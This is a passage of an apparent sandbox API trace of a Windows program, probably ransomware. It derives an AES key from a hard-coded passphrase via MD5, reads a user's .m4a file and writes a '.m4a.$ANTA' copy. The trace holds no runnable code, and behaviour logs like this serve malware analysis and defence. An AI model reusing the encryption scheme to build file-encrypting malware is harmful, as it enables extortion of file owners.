returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0115.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0115.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0115.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0115.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0115.072] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0115.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0115.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0115.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0115.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0115.073] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0115.073] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a5360) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0115.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0115.075] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0115.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.076] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0115.076] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.076] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.119] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.119] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.119] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0115.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0115.119] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0115.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0115.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0115.119] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0115.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0115.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0115.120] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.120] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0115.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0115.120] CryptHashData (hHash=0x41ac600, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0115.120] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.120] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.120] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0115.120] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac440) returned 1 [0115.120] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.120] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0115.121] CryptDestroyHash (hHash=0x41ac600) returned 1 [0115.121] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\0qhbs_ht9zbd62a.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0115.121] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.121] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0115.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0115.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0115.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0115.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0115.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0115.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0115.122] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0115.122] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359cd8 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0115.123] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy")) returned 0x10 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0115.123] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\0qhbs_ht9zbd62a.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0115.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0115.124] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0115.124] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0115.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0115.127] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0115.127] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x6953, lpOverlapped=0x0) returned 1 [0115.128] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0115.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0115.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6953) returned 0x4516010 [0115.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0115.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0115.131] RtlAllocateHeap 